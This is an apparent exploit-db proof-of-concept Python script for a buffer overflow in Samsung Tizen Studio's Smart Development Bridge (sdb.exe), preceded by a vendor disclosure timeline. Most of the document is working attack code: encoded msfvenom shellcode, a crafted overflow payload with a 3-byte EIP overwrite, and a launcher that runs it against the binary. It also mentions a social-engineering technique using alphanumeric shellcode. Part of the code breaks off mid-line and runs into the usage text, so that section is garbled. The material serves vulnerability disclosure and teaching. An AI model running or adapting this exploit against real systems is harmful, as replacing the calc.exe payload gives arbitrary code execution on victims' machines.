# Exploit Title: Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC # Date: 22.10.17 # Exploit Author: Marcin Kopec # Vendor Homepage: https://developer.tizen.org/ # Software Link: https://developer.tizen.org/development/tizen-studio/download# # Version: 2.3.0, 2.3.2 (some older versions are affected as well) # Tested on: Microsoft Windows [Version 10.0.16299.19] # 2.3.2 (sdb.exe can be extracted from Tizen Studio 1.3 for Windows x86/x64 installation package): # e88de99ee069412b7612d85c00aa62fc sdb.exe # 2.3.0: # f9fd3896195900ec604c6f182a411e18 sdb.exe # The file can be located in "tools" subdirectory after the extraction # This code has been created for educational purposes only, to raise awareness on software security, and it's harmless # by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious # Vulnerability Discovery History # 28/Jul/16 - Tizen Project has been informed about the vulnerability (https://bugs.tizen.org/browse/TM-249) # 28/Jul/16 - Got suggestion from CL to inform Tizen Mobile project # 29/Jul/16 - Moved the issue to Tizen Mobile project # - NO RESPONSE - # 7/Sep/16 - Escalated through Samsung security contact (BZ) # 14/Nov/16 - Got informed by BZ that HQ is dealing with the issue with no further details # - NO RESPONSE - # 02/Oct/17 - Tizen Mobile project has been informed about plans to release PoC on exploit-db # - NO RESPONSE - # 22/Oct/17 - The PoC submitted to exploit-db import struct import subprocess import sys ARGS = " launch A A A A A " def tech_direct_exec(sdb_path): # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/shikata_ga_nai \ # -b '\x00\x20\x0a\x0d\x1b\x0b\x0c' -f python buf = "" buf += "\xb8\xb6\x98\xe6\xfa\xdb\xcb\xd9\x74\x24\xf4\x5b\x31" buf += "\xc9\xb1\x30\x31\x43\x13\x83\xeb\xfc\x03\x43\xb9\x7a" buf += "\x13\x06\x2d\xf8\xdc\xf7\xad\x9d\x55\x12\x9c\x9d\x02" buf += "\x56\x8e\x2d\x40\x3a\x22\xc5\x04\xaf\xb1\xab\x80\xc0" buf += "\x72\x01\xf7\xef\x83\x3a\xcb\x6e\x07\x41\x18\x51\x36" buf += "\x8a\x6d\x90\x7f\xf7\x9c\xc0\x28\x73\x32\xf5\x5d\xc9" buf += "\x8f\x7e\x2d\xdf\x97\x63\xe5\xde\xb6\x35\x7e\xb9\x18" buf += "\xb7\x53\xb1\x10\xaf\xb0\xfc\xeb\x44\x02\x8a\xed\x8c" buf += "\x5b\x73\x41\xf1\x54\x86\x9b\x35\x52\x79\xee\x4f\xa1" buf += "\x04\xe9\x8b\xd8\xd2\x7c\x08\x7a\x90\x27\xf4\x7b\x75" buf += "\xb1\x7f\x77\x32\xb5\xd8\x9b\xc5\x1a\x53\xa7\x4e\x9d" buf += "\xb4\x2e\x14\xba\x10\x6b\xce\xa3\x01\xd1\xa1\xdc\x52" buf += "\xba\x1e\x79\x18\x56\x4a\xf0\x43\x3c\x8d\x86\xf9\x72" buf += "\x8d\x98\x01\x22\xe6\xa9\x8a\xad\x71\x36\x59\x8a\x8e" buf += "\x7c\xc0\xba\x06\xd9\x90\xff\x4a\xda\x4e\xc3\x72\x59" buf += "\x7b\xbb\x80\x41\x0e\xbe\xcd\xc5\xe2\xb2\x5e\xa0\x04" buf += "\x61\x5e\xe1\x66\xe4\xcc\x69\x69" stack_adj = "\x83\xEC\x7F" * 2 # SUB ESP,0x7F - stack adjustment sc = stack_adj + buf eip = "\x01\xed\x8b" # 008BED01 - 3 byte EIP overwrite payload = "B" * 2000 + "\x90" * (2086 - len(sc) - 1) + "\x90" + sc + eip print "Trying to exploit the binary... " print "Payload length: " + str(len(payload)) print sdb_path + ARGS + payload subprocess.Popen([sdb_path, "launch", "A", "A", "A", "A", "A", payload], stdout=subprocess.PIPE) def tech_social_ascii(sdb_path, jmp_esp_addr): eip = struct.pack(' Demonstrated Exploitation Techniques: 1: Direct execution, 3-byte EIP overwrite, Stack adjustment 2: Payload for social engineering attack, JMP ESP (!mona find -s "\\xff\\xe4" -cp alphanum), Alphanumeric shellcode 3: Bonus exercise - source code analysis This code has been created for educational purposes only, to raise awareness on software security, and it's harmless by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious Usage: python sdbBOpoc.py [Technique_ID] [Path_to_sdb.exe] [Address_of_JMP_ESP] Examples: python sdbBOpoc.py 1 C:\Tizen\Tools\sdb.exe python sdbBOpoc.py 2 C:\Tizen\Tools\sdb.exe 0x76476557 python sdbBOpoc.py 3""" def main(): if len(sys.argv) > 1: if int(sys.argv[1]) == 1: if len(sys.argv) == 3: tech_direct_exec(sys.argv[2]) if int(sys.argv[1]) == 2: if len(sys.argv) == 4: tech_social_ascii(sys.argv[2], sys.argv[3]) if int(sys.argv[1]) == 3: bonus_exercise() else: usage() if __name__ == '__main__': main()